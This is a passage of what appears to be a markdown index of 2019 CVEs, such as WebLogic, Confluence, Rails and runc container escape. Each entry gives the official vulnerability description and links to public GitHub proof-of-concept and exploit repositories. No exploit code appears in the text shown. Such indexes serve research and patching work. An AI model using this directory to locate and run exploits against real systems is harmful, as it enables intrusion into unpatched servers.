[leerina/CVE-2019-2725](https://github.com/leerina/CVE-2019-2725) +- [zhusx110/cve-2019-2725](https://github.com/zhusx110/cve-2019-2725) +- [lufeirider/CVE-2019-2725](https://github.com/lufeirider/CVE-2019-2725) +- [TopScrew/CVE-2019-2725](https://github.com/TopScrew/CVE-2019-2725) +- [welove88888/CVE-2019-2725](https://github.com/welove88888/CVE-2019-2725) +- [jiansiting/CVE-2019-2725](https://github.com/jiansiting/CVE-2019-2725) +- [kerlingcode/CVE-2019-2725](https://github.com/kerlingcode/CVE-2019-2725) +- [black-mirror/Weblogic](https://github.com/black-mirror/Weblogic) +- [pimps/CVE-2019-2725](https://github.com/pimps/CVE-2019-2725) +- [ianxtianxt/CVE-2019-2725](https://github.com/ianxtianxt/CVE-2019-2725) +- [N0b1e6/CVE-2019-2725-POC](https://github.com/N0b1e6/CVE-2019-2725-POC) +- [GGyao/weblogic_2019_2725_wls_batch](https://github.com/GGyao/weblogic_2019_2725_wls_batch) +- [ludy-dev/Oracle-WLS-Weblogic-RCE](https://github.com/ludy-dev/Oracle-WLS-Weblogic-RCE) +- [1stPeak/CVE-2019-2725-environment](https://github.com/1stPeak/CVE-2019-2725-environment) +- [CalegariMindSec/Exploit-CVE-2019-2725](https://github.com/CalegariMindSec/Exploit-CVE-2019-2725) + +### CVE-2019-2729 (2019-06-19) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [waffl3ss/CVE-2019-2729](https://github.com/waffl3ss/CVE-2019-2729) +- [ruthlezs/CVE-2019-2729-Exploit](https://github.com/ruthlezs/CVE-2019-2729-Exploit) +- [pizza-power/weblogic-CVE-2019-2729-POC](https://github.com/pizza-power/weblogic-CVE-2019-2729-POC) +- [Luchoane/CVE-2019-2729_creal](https://github.com/Luchoane/CVE-2019-2729_creal) + +### CVE-2019-2888 (2019-10-16) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: EJB Container). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). + + +- [jas502n/CVE-2019-2888](https://github.com/jas502n/CVE-2019-2888) + +### CVE-2019-2890 (2019-10-16) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). + + +- [ZO1RO/CVE-2019-2890](https://github.com/ZO1RO/CVE-2019-2890) +- [Ky0-HVA/CVE-2019-2890](https://github.com/Ky0-HVA/CVE-2019-2890) +- [freeide/weblogic_cve-2019-2890](https://github.com/freeide/weblogic_cve-2019-2890) +- [l1nk3rlin/CVE-2019-2890](https://github.com/l1nk3rlin/CVE-2019-2890) +- [jas502n/CVE-2019-2890](https://github.com/jas502n/CVE-2019-2890) +- [ianxtianxt/CVE-2019-2890](https://github.com/ianxtianxt/CVE-2019-2890) +- [zhzhdoai/Weblogic_Vuln](https://github.com/zhzhdoai/Weblogic_Vuln) + +### CVE-2019-3010 (2019-10-16) + +Vulnerability in the Oracle Solaris product of Oracle Systems (component: XScreenSaver). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). + + +- [chaizeg/privilege-escalation-breach](https://github.com/chaizeg/privilege-escalation-breach) + +### CVE-2019-3394 (2019-08-29) + +There was a local file disclosure vulnerability in Confluence Server and Confluence Data Center via page exporting. An attacker with permission to editing a page is able to exploit this issue to read arbitrary file on the server under <install-directory>/confluence/WEB-INF directory, which may contain configuration files used for integrating with other services, which could potentially leak credentials or other sensitive information such as LDAP credentials. The LDAP credential will be potentially leaked only if the Confluence server is configured to use LDAP as user repository. All versions of Confluence Server from 6.1.0 before 6.6.16 (the fixed version for 6.6.x), from 6.7.0 before 6.13.7 (the fixed version for 6.13.x), and from 6.14.0 before 6.15.8 (the fixed version for 6.15.x) are affected by this vulnerability. + + +- [jas502n/CVE-2019-3394](https://github.com/jas502n/CVE-2019-3394) + +### CVE-2019-3396 (2019-03-25) + +The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection. + + +- [dothanthitiendiettiende/CVE-2019-3396](https://github.com/dothanthitiendiettiende/CVE-2019-3396) +- [x-f1v3/CVE-2019-3396](https://github.com/x-f1v3/CVE-2019-3396) +- [xiaoshuier/CVE-2019-3396](https://github.com/xiaoshuier/CVE-2019-3396) +- [Yt1g3r/CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP) +- [jas502n/CVE-2019-3396](https://github.com/jas502n/CVE-2019-3396) +- [pyn3rd/CVE-2019-3396](https://github.com/pyn3rd/CVE-2019-3396) +- [s1xg0d/CVE-2019-3396](https://github.com/s1xg0d/CVE-2019-3396) +- [quanpt103/CVE-2019-3396](https://github.com/quanpt103/CVE-2019-3396) +- [vntest11/confluence_CVE-2019-3396](https://github.com/vntest11/confluence_CVE-2019-3396) +- [tanw923/test1](https://github.com/tanw923/test1) +- [skommando/CVE-2019-3396-confluence-poc](https://github.com/skommando/CVE-2019-3396-confluence-poc) +- [JonathanZhou348/CVE-2019-3396TEST](https://github.com/JonathanZhou348/CVE-2019-3396TEST) +- [am6539/CVE-2019-3396](https://github.com/am6539/CVE-2019-3396) +- [W2Ning/CVE-2019-3396](https://github.com/W2Ning/CVE-2019-3396) +- [yuehanked/cve-2019-3396](https://github.com/yuehanked/cve-2019-3396) +- [0xNinjaCyclone/cve-2019-3396](https://github.com/0xNinjaCyclone/cve-2019-3396) +- [46o60/CVE-2019-3396_Confluence](https://github.com/46o60/CVE-2019-3396_Confluence) +- [PetrusViet/cve-2019-3396](https://github.com/PetrusViet/cve-2019-3396) +- [Avento/CVE-2019-3396-Memshell-for-Behinder](https://github.com/Avento/CVE-2019-3396-Memshell-for-Behinder) + +### CVE-2019-3398 (2019-04-18) + +Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. All versions of Confluence Server from 2.0.0 before 6.6.13 (the fixed version for 6.6.x), from 6.7.0 before 6.12.4 (the fixed version for 6.12.x), from 6.13.0 before 6.13.4 (the fixed version for 6.13.x), from 6.14.0 before 6.14.3 (the fixed version for 6.14.x), and from 6.15.0 before 6.15.2 are affected by this vulnerability. + + +- [superevr/cve-2019-3398](https://github.com/superevr/cve-2019-3398) +- [132231g/CVE-2019-3398](https://github.com/132231g/CVE-2019-3398) + +### CVE-2019-3403 (2019-05-22) + +The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. + + +- [und3sc0n0c1d0/UserEnumJira](https://github.com/und3sc0n0c1d0/UserEnumJira) +- [davidmckennirey/CVE-2019-3403](https://github.com/davidmckennirey/CVE-2019-3403) + +### CVE-2019-3462 (2019-01-28) + +Incorrect sanitation of the 302 redirect field in HTTP transport method of apt versions 1.4.8 and earlier can lead to content injection by a MITM attacker, potentially leading to remote code execution on the target machine. + + +- [tonejito/check_CVE-2019-3462](https://github.com/tonejito/check_CVE-2019-3462) +- [atilacastro/update-apt-package](https://github.com/atilacastro/update-apt-package) + +### CVE-2019-3663 (2019-11-13) + +Unprotected Storage of Credentials vulnerability in McAfee Advanced Threat Defense (ATD) prior to 4.8 allows local attacker to gain access to the root password via accessing sensitive files on the system. This was originally published with a CVSS rating of High, further investigation has resulted in this being updated to Critical. The root password is common across all instances of ATD prior to 4.8. See the Security bulletin for further details + + +- [funoverip/mcafee_atd_CVE-2019-3663](https://github.com/funoverip/mcafee_atd_CVE-2019-3663) + +### CVE-2019-3719 (2019-04-18) + +Dell SupportAssist Client versions prior to 3.2.0.90 contain a remote code execution vulnerability. An unauthenticated attacker, sharing the network access layer with the vulnerable system, can compromise the vulnerable system by tricking a victim user into downloading and executing arbitrary executables via SupportAssist client from attacker hosted sites. + + +- [jiansiting/CVE-2019-3719](https://github.com/jiansiting/CVE-2019-3719) + +### CVE-2019-3778 (2019-03-07) + +Spring Security OAuth, versions 2.3 prior to 2.3.5, and 2.2 prior to 2.2.4, and 2.1 prior to 2.1.4, and 2.0 prior to 2.0.17, and older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malicious user or attacker can craft a request to the authorization endpoint using the authorization code grant type, and specify a manipulated redirection URI via the "redirect_uri" parameter. This can cause the authorization server to redirect the resource owner user-agent to a URI under the control of the attacker with the leaked authorization code. This vulnerability exposes applications that meet all of the following requirements: Act in the role of an Authorization Server (e.g. @EnableAuthorizationServer) and uses the DefaultRedirectResolver in the AuthorizationEndpoint. This vulnerability does not expose applications that: Act in the role of an Authorization Server and uses a different RedirectResolver implementation other than DefaultRedirectResolver, act in the role of a Resource Server only (e.g. @EnableResourceServer), act in the role of a Client only (e.g. @EnableOAuthClient). + + +- [BBB-man/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection](https://github.com/BBB-man/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection) + +### CVE-2019-3799 (2019-05-06) + +Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. + + +- [mpgn/CVE-2019-3799](https://github.com/mpgn/CVE-2019-3799) +- [Corgizz/SpringCloud](https://github.com/Corgizz/SpringCloud) + +### CVE-2019-3810 (2019-03-25) + +A flaw was found in moodle versions 3.6 to 3.6.1, 3.5 to 3.5.3, 3.4 to 3.4.6, 3.1 to 3.1.15 and earlier unsupported versions. The /userpix/ page did not escape users' full names, which are included as text when hovering over profile images. Note this page is not linked to by default and its access is restricted. + + +- [farisv/Moodle-CVE-2019-3810](https://github.com/farisv/Moodle-CVE-2019-3810) + +### CVE-2019-3847 (2019-03-27) + +A vulnerability was found in moodle before versions 3.6.3, 3.5.5, 3.4.8 and 3.1.17. Users with the "login as other users" capability (such as administrators/managers) can access other users' Dashboards, but the JavaScript those other users may have added to their Dashboard was not being escaped when being viewed by the user logging in on their behalf. + + +- [danielthatcher/moodle-login-csrf](https://github.com/danielthatcher/moodle-login-csrf) + +### CVE-2019-3929 (2019-04-30) + +The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. + + +- [xfox64x/CVE-2019-3929](https://github.com/xfox64x/CVE-2019-3929) + +### CVE-2019-3980 (2019-10-08) + +The Solarwinds Dameware Mini Remote Client agent v12.1.0.89 supports smart card authentication which can allow a user to upload an executable to be executed on the DWRCS.exe host. An unauthenticated, remote attacker can request smart card login and upload and execute an arbitrary executable run under the Local System account. + + +- [warferik/CVE-2019-3980](https://github.com/warferik/CVE-2019-3980) +- [Barbarisch/CVE-2019-3980](https://github.com/Barbarisch/CVE-2019-3980) + +### CVE-2019-4650 (2020-06-26) + +IBM Maximo Asset Management 7.6.1.1 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 170961. + + +- [aneeshanilkumar89/Maximo_Sql_Injection-CVE-2019-4650](https://github.com/aneeshanilkumar89/Maximo_Sql_Injection-CVE-2019-4650) + +### CVE-2019-5010 (2019-10-31) + +An exploitable denial-of-service vulnerability exists in the X509 certificate parser of Python.org Python 2.7.11 / 3.6.6. A specially crafted X509 certificate can cause a NULL pointer dereference, resulting in a denial of service. An attacker can initiate or accept TLS connections using crafted certificates to trigger this vulnerability. + + +- [JonathanWilbur/CVE-2019-5010](https://github.com/JonathanWilbur/CVE-2019-5010) + +### CVE-2019-5029 (2019-11-13) + +An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process. + + +- [thehunt1s0n/Exihibitor-RCE](https://github.com/thehunt1s0n/Exihibitor-RCE) + +### CVE-2019-5096 (2019-12-03) + +An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5. A specially crafted HTTP request can lead to a use-after-free condition during the processing of this request that can be used to corrupt heap structures that could lead to full code execution. The request can be unauthenticated in the form of GET or POST requests, and does not require the requested resource to exist on the server. + + +- [ianxtianxt/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit](https://github.com/ianxtianxt/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit) + +### CVE-2019-5413 (2019-03-17) + +An attacker can use the format parameter to inject arbitrary commands in the npm package morgan < 1.9.1. + + +- [forse01/CVE-2019-5413-NetBeans](https://github.com/forse01/CVE-2019-5413-NetBeans) +- [forse01/CVE-2019-5413-NetBeans-NoJson](https://github.com/forse01/CVE-2019-5413-NetBeans-NoJson) + +### CVE-2019-5418 (2019-03-27) + +There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed. + + +- [mpgn/CVE-2019-5418](https://github.com/mpgn/CVE-2019-5418) +- [omarkurt/CVE-2019-5418](https://github.com/omarkurt/CVE-2019-5418) +- [brompwnie/CVE-2019-5418-Scanner](https://github.com/brompwnie/CVE-2019-5418-Scanner) +- [mpgn/Rails-doubletap-RCE](https://github.com/mpgn/Rails-doubletap-RCE) +- [takeokunn/CVE-2019-5418](https://github.com/takeokunn/CVE-2019-5418) +- [Bad3r/RailroadBandit](https://github.com/Bad3r/RailroadBandit) +- [ztgrace/CVE-2019-5418-Rails3](https://github.com/ztgrace/CVE-2019-5418-Rails3) +- [random-robbie/CVE-2019-5418](https://github.com/random-robbie/CVE-2019-5418) +- [kailing0220/CVE-2019-5418](https://github.com/kailing0220/CVE-2019-5418) + +### CVE-2019-5420 (2019-03-27) + +A remote code execution vulnerability in development mode Rails <5.2.2.1, <6.0.0.beta3 can allow an attacker to guess the automatically generated development mode secret token. This secret token can be used in combination with other Rails internals to escalate to a remote code execution exploit. + + +- [knqyf263/CVE-2019-5420](https://github.com/knqyf263/CVE-2019-5420) +- [cved-sources/cve-2019-5420](https://github.com/cved-sources/cve-2019-5420) +- [AnasTaoutaou/CVE-2019-5420](https://github.com/AnasTaoutaou/CVE-2019-5420) +- [Eremiel/CVE-2019-5420](https://github.com/Eremiel/CVE-2019-5420) +- [scumdestroy/CVE-2019-5420.rb](https://github.com/scumdestroy/CVE-2019-5420.rb) +- [j4k0m/CVE-2019-5420](https://github.com/j4k0m/CVE-2019-5420) +- [mmeza-developer/CVE-2019-5420-RCE](https://github.com/mmeza-developer/CVE-2019-5420-RCE) +- [trickstersec/CVE-2019-5420](https://github.com/trickstersec/CVE-2019-5420) +- [PenTestical/CVE-2019-5420](https://github.com/PenTestical/CVE-2019-5420) +- [laffray/ruby-RCE-CVE-2019-5420-](https://github.com/laffray/ruby-RCE-CVE-2019-5420-) + +### CVE-2019-5427 (2019-04-22) + +c3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration. + + +- [shanika04/cp30_XXE_partial_fix](https://github.com/shanika04/cp30_XXE_partial_fix) + +### CVE-2019-5454 (2019-07-30) + +SQL Injection in the Nextcloud Android app prior to version 3.0.0 allows to destroy a local cache when a harmful query is executed requiring to resetup the account. + + +- [shanika04/nextcloud_android](https://github.com/shanika04/nextcloud_android) + +### CVE-2019-5475 (2019-09-03) + +The Nexus Yum Repository Plugin in v2 is vulnerable to Remote Code Execution when instances using CommandLineExecutor.java are supplied vulnerable data, such as the Yum Configuration Capability. + + +- [jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-](https://github.com/jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-) +- [rabbitmask/CVE-2019-5475-EXP](https://github.com/rabbitmask/CVE-2019-5475-EXP) +- [EXP-Docs/CVE-2019-5475](https://github.com/EXP-Docs/CVE-2019-5475) + +### CVE-2019-5489 (2019-01-07) + +The mincore() implementation in mm/mincore.c in the Linux kernel through 4.19.13 allowed local attackers to observe page cache access patterns of other processes on the same system, potentially allowing sniffing of secret information. (Fixing this affects the output of the fincore program.) Limited remote exploitation may be possible, as demonstrated by latency differences in accessing public files from an Apache HTTP Server. + + +- [mmxsrup/CVE-2019-5489](https://github.com/mmxsrup/CVE-2019-5489) + +### CVE-2019-5544 (2019-12-06) + +OpenSLP as used in ESXi and the Horizon DaaS appliances has a heap overwrite issue. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. + + +- [HynekPetrak/CVE-2019-5544_CVE-2020-3992](https://github.com/HynekPetrak/CVE-2019-5544_CVE-2020-3992) +- [dgh05t/VMware_ESXI_OpenSLP_PoCs](https://github.com/dgh05t/VMware_ESXI_OpenSLP_PoCs) + +### CVE-2019-5596 (2019-02-12) + +In FreeBSD 11.2-STABLE after r338618 and before r343786, 12.0-STABLE before r343781, and 12.0-RELEASE before 12.0-RELEASE-p3, a bug in the reference count implementation for UNIX domain sockets can cause a file structure to be incorrectly released potentially allowing a malicious local user to gain root privileges or escape from a jail. + + +- [raymontag/CVE-2019-5596](https://github.com/raymontag/CVE-2019-5596) + +### CVE-2019-5603 (2019-07-26) + +In FreeBSD 12.0-STABLE before r350261, 12.0-RELEASE before 12.0-RELEASE-p8, 11.3-STABLE before r350263, 11.3-RELEASE before 11.3-RELEASE-p1, and 11.2-RELEASE before 11.2-RELEASE-p12, system calls operating on file descriptors as part of mqueuefs did not properly release the reference allowing a malicious user to overflow the counter allowing access to files, directories, and sockets opened by processes owned by other users. + + +- [raymontag/CVE-2019-5603](https://github.com/raymontag/CVE-2019-5603) + +### CVE-2019-5624 (2019-04-30) + +Rapid7 Metasploit Framework suffers from an instance of CWE-22, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in the Zip import function of Metasploit. Exploiting this vulnerability can allow an attacker to execute arbitrary code in Metasploit at the privilege level of the user running Metasploit. This issue affects: Rapid7 Metasploit Framework version 4.14.0 and prior versions. + + +- [VoidSec/CVE-2019-5624](https://github.com/VoidSec/CVE-2019-5624) + +### CVE-2019-5630 (2019-07-03) + +A Cross-Site Request Forgery (CSRF) vulnerability was found in Rapid7 Nexpose InsightVM Security Console versions 6.5.0 through 6.5.68. This issue allows attackers to exploit CSRF vulnerabilities on API endpoints using Flash to circumvent a cross-domain pre-flight OPTIONS request. + + +- [rbeede/CVE-2019-5630](https://github.com/rbeede/CVE-2019-5630) + +### CVE-2019-5700 (2019-10-09) + +NVIDIA Shield TV Experience prior to v8.0.1, NVIDIA Tegra software contains a vulnerability in the bootloader, where it does not validate the fields of the boot image, which may lead to code execution, denial of service, escalation of privileges, and information disclosure. + + +- [oscardagrach/CVE-2019-5700](https://github.com/oscardagrach/CVE-2019-5700) + +### CVE-2019-5736 (2019-02-11) + +runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe. + + +- [q3k/cve-2019-5736-poc](https://github.com/q3k/cve-2019-5736-poc) +- [Frichetten/CVE-2019-5736-PoC](https://github.com/Frichetten/CVE-2019-5736-PoC) +- [jas502n/CVE-2019-5736](https://github.com/jas502n/CVE-2019-5736) +- [likekabin/CVE-2019-5736](https://github.com/likekabin/CVE-2019-5736) +- [likekabin/cve-2019-5736-poc](https://github.com/likekabin/cve-2019-5736-poc) +- [agppp/cve-2019-5736-poc](https://github.com/agppp/cve-2019-5736-poc) +- [b3d3c/poc-cve-2019-5736](https://github.com/b3d3c/poc-cve-2019-5736) +- [twistlock/RunC-CVE-2019-5736](https://github.com/twistlock/RunC-CVE-2019-5736) +- [yyqs2008/CVE-2019-5736-PoC-2](https://github.com/yyqs2008/CVE-2019-5736-PoC-2) +- [stillan00b/CVE-2019-5736](https://github.com/stillan00b/CVE-2019-5736) +- [milloni/cve-2019-5736-exp](https://github.com/milloni/cve-2019-5736-exp) +- [panzouh/Docker-Runc-Exploit](https://github.com/panzouh/Docker-Runc-Exploit) +- [RyanNgWH/CVE-2019-5736-POC](https://github.com/RyanNgWH/CVE-2019-5736-POC) +- [Lee-SungYoung/cve-2019-5736-study](https://github.com/Lee-SungYoung/cve-2019-5736-study) +- [chosam2/cve-2019-5736-poc](https://github.com/chosam2/cve-2019-5736-poc) +- [epsteina16/Docker-Escape-Miner](https://github.com/epsteina16/Docker-Escape-Miner) +- [geropl/CVE-2019-5736](https://github.com/geropl/CVE-2019-5736) +- [GiverOfGifts/CVE-2019-5736-Custom-Runtime](https://github.com/GiverOfGifts/CVE-2019-5736-Custom-Runtime) +- [Billith/CVE-2019-5736-PoC](https://github.com/Billith/CVE-2019-5736-PoC) +- [BBRathnayaka/POC-CVE-2019-5736](https://github.com/BBRathnayaka/POC-CVE-2019-5736) +- [shen54/IT19172088](https://github.com/shen54/IT19172088) +- [n3rdh4x0r/CVE-2019-5736](https://github.com/n3rdh4x0r/CVE-2019-5736) +- [fahmifj/Docker-breakout-runc](https://github.com/fahmifj/Docker-breakout-runc) +- [Asbatel/CVE-2019-5736_POC](https://github.com/Asbatel/CVE-2019-5736_POC) +- [takumak/cve-2019-5736-reproducer](https://github.com/takumak/cve-2019-5736-reproducer) +- [si1ent-le/CVE-2019-5736](https://github.com/si1ent-le/CVE-2019-5736) +- [sonyavalo/CVE-2019-5736-attack-and-security-mechanism](https://github.com/sonyavalo/CVE-2019-5736-attack-and-security-mechanism) + +### CVE-2019-5737 (2019-03-28) + +In Node.js including 6.x before 6.17.0, 8.x before 8.15.1, 10.x before 10.15.2, and 11.x before 11.10.1, an attacker can cause a Denial of Service (DoS) by establishing an HTTP or HTTPS connection in keep-alive mode and by sending headers very slowly. This keeps the connection and associated resources alive for a long period of time. Potential attacks are mitigated by the use of a load balancer or other proxy layer. This vulnerability is an extension of CVE-2018-12121, addressed in November and impacts all active Node.js release lines including 6.x before 6.17.0, 8.x before 8.15.1, 10.x before 10.15.2, and 11.x before 11.10.1. + + +- [beelzebruh/cve-2019-5737](https://github.com/beelzebruh/cve-2019-5737) + +### CVE-2019-5782 (2019-02-19) + +Incorrect optimization assumptions in V8 in Google Chrome prior to 72.0.3626.81 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. + + +- [ZwCreatePhoton/CVE-2019-5782_CVE-2019-13768](https://github.com/ZwCreatePhoton/CVE-2019-5782_CVE-2019-13768) + +### CVE-2019-5784 (2019-06-27) + +Incorrect handling of deferred code in V8 in Google Chrome prior to 72.0.3626.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [rooootdev/CVE-2019-5784-PoC](https://github.com/rooootdev/CVE-2019-5784-PoC) + +### CVE-2019-5786 (2019-06-27) + +Object lifetime issue in Blink in Google Chrome prior to 72.0.3626.121 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. + + +- [exodusintel/CVE-2019-5786](https://github.com/exodusintel/CVE-2019-5786) + +### CVE-2019-5822 (2019-06-27) + +Inappropriate implementation in Blink in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to bypass same origin policy via a crafted HTML page. + + +- [Silence-Rain/14-828_Exploitation_of_CVE-2019-5822](https://github.com/Silence-Rain/14-828_Exploitation_of_CVE-2019-5822) + +### CVE-2019-5825 (2019-11-25) + +Out of bounds write in JavaScript in Google Chrome prior to 73.0.3683.86 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [timwr/CVE-2019-5825](https://github.com/timwr/CVE-2019-5825) + +### CVE-2019-5893 (2019-01-10) + +Nelson Open Source ERP v6.3.1 allows SQL Injection via the db/utils/query/data.xml query parameter. + + +- [EmreOvunc/OpenSource-ERP-SQL-Injection](https://github.com/EmreOvunc/OpenSource-ERP-SQL-Injection) + +### CVE-2019-6111 (2019-01-31) + +An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example, to overwrite the .ssh/authorized_keys file). + + +- [53n7hu/SNP](https://github.com/53n7hu/SNP) +- [mbadanoiu/MAL-008](https://github.com/mbadanoiu/MAL-008) + +### CVE-2019-6203 (2020-04-17) + +A logic issue was addressed with improved state management. This issue is fixed in iOS 12.2, macOS Mojave 10.14.4, tvOS 12.2. An attacker in a privileged network position may be able to intercept network traffic. + + +- [qingxp9/CVE-2019-6203-PoC](https://github.com/qingxp9/CVE-2019-6203-PoC) + +### CVE-2019-6207 (2019-12-18) + +An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation. This issue is fixed in iOS 12.2, macOS Mojave 10.14.4, tvOS 12.2, watchOS 5.2. A malicious application may be able to determine kernel memory layout. + + +- [dothanthitiendiettiende/CVE-2019-6207](https://github.com/dothanthitiendiettiende/CVE-2019-6207) +- [maldiohead/CVE-2019-6207](https://github.com/maldiohead/CVE-2019-6207) +- [DimitriFourny/cve-2019-6207](https://github.com/DimitriFourny/cve-2019-6207) + +### CVE-2019-6225 (2019-03-05) + +A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 12.1.3, macOS Mojave 10.14.3, tvOS 12.1.2. A malicious application may be able to elevate privileges. + + +- [fatgrass/OsirisJailbreak12](https://github.com/fatgrass/OsirisJailbreak12) +- [TrungNguyen1909/CVE-2019-6225-macOS](https://github.com/TrungNguyen1909/CVE-2019-6225-macOS) +- [raystyle/jailbreak-iOS12](https://github.com/raystyle/jailbreak-iOS12) + +### CVE-2019-6249 (2019-01-13) + +An issue was discovered in HuCart v5.7.4. There is a CSRF vulnerability that can add an admin account via /adminsys/index.php?load=admins&act=edit_info&act_type=add. + + +- [AlphabugX/CVE-2019-6249_Hucart-cms](https://github.com/AlphabugX/CVE-2019-6249_Hucart-cms) + +### CVE-2019-6250 (2019-01-13) + +A pointer overflow, with code execution, was discovered in ZeroMQ libzmq (aka 0MQ) 4.2.x and 4.3.x before 4.3.1. A v2_decoder.cpp zmq::v2_decoder_t::size_ready integer overflow allows an authenticated attacker to overwrite an arbitrary amount of bytes beyond the bounds of a buffer, which can be leveraged to run arbitrary code on the target system. The memory layout allows the attacker to inject OS commands into a data structure located immediately after the problematic buffer (i.e., it is not necessary to use a typical buffer-overflow exploitation technique that changes the flow of control). + + +- [AkashicYiTai/CVE-2019-6250-libzmq](https://github.com/AkashicYiTai/CVE-2019-6250-libzmq) + +### CVE-2019-6260 (2019-01-22) + +The ASPEED ast2400 and ast2500 Baseband Management Controller (BMC) hardware and firmware implement Advanced High-performance Bus (AHB) bridges, which allow arbitrary read and write access to the BMC's physical address space from the host (or from the network in unusual cases where the BMC console uart is attached to a serial concentrator). This CVE applies to the specific cases of iLPC2AHB bridge Pt I, iLPC2AHB bridge Pt II, PCIe VGA P2A bridge, DMA from/to arbitrary BMC memory via X-DMA, UART-based SoC 